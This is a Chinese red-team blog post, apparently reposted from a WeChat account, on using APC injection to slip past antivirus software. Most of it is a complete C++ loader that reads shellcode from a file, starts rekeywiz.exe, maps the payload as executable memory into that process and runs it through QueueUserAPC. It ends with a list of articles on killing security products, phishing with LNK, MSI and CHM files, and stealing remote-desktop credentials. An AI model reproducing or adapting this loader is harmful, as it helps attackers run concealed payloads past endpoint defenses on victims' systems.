-
异步执行控制
-
APC 允许外部线程向目标线程的队列中插入一个回调函数(APC 函数),当目标线程进入 可警报状态(Alertable State) 时(如调用 SleepEx
、WaitForSingleObjectEx
等),该函数会被自动执行。 -
恶意代码通过插入 APC 到目标进程线程,劫持其执行流程。 -
隐蔽性
-
不依赖传统的进程注入(如 CreateRemoteThread
),避免了直接创建远程线程的敏感行为,更难被安全软件检测。
using myNtTestAlert = NTSTATUS(NTAPI*)();
voidmymemcpy(void* dst, void* src, size_t size)
{
char* psrc, * pdst;
if (dst == NULL || src == NULL)
return;
if (dst <= src)
{
psrc = (char*)src;
pdst = (char*)dst;
while (size--)
*pdst++ = *psrc++;
}
else
{
psrc = (char*)src + size - 1;
pdst = (char*)dst + size - 1;
while (size--) {
*pdst-- = *psrc--;
}
}
}
intmain(){
FILE* fp;
size_t size;
unsigned char* buffer;
fp = fopen("1.bin", "rb");
fseek(fp, 0, SEEK_END);
size = ftell(fp);
fseek(fp, 0, SEEK_SET);
buffer = (unsigned char*)malloc(size);
fread(buffer, size, 1, fp);
fclose(fp);
myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
LPCSTR lpApplication = "C:\Windows\System32\rekeywiz.exe";
STARTUPINFO sInfo = { 0 };
PROCESS_INFORMATION pInfo = { 0 };
sInfo.cb = sizeof(STARTUPINFO);
CreateProcessA(lpApplication, NULL, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, (LPSTARTUPINFOA)&sInfo, &pInfo);
HANDLE hProc = pInfo.hProcess;
HANDLE hThread = pInfo.hThread;
DWORD ProcessId = pInfo.dwProcessId;
HANDLE hMapping = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, size, NULL);
LPVOID lpMapAddress = MapViewOfFile(hMapping, FILE_MAP_WRITE, 0, 0, size);
mymemcpy(lpMapAddress, buffer, size);
LPVOID lpMapAddressRemote = MapViewOfFile2(hMapping, hProc, 0, NULL, 0, 0, PAGE_EXECUTE_READ);
DebugActiveProcessStop(ProcessId);
QueueUserAPC(PAPCFUNC(lpMapAddressRemote), hThread, NULL);
testAlert();
ResumeThread(hThread);
CloseHandle(hThread);
CloseHandle(hProc);
CloseHandle(hMapping);
UnmapViewOfFile(lpMapAddress);
return 0;
}
-
HeavenlyBypassAV内部版 -
HeavenlyX86内部版 -
红队场景下lnk钓鱼Bypass国内AV -
LNK钓鱼图标自适应制作 -
lnk钓鱼思路视频讲解 -
lnk钓鱼Bypass某擎 -
msi钓鱼 -
chm钓鱼 -
Kill360核晶 -
AV对抗-致盲AV(核晶) -
捆绑免杀360 -
kill火绒 -
火绒6.0内存免杀 -
Defender分离免杀 -
Defender知识点 -
HeavenlyProtectionCS内部CS插件 -
EDR对抗思路 -
自启动思路 -
Fscan免杀核晶 -
QVM解决思路 -
红队思路-钓鱼环境下小窗口截屏窃取 -
免杀Todesk/向日葵读取工具 -
还有更多红队思路文章!期待您的加入!!!
原文始发于微信公众号(安全天书):【免杀思路】APC注入绕过杀软
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论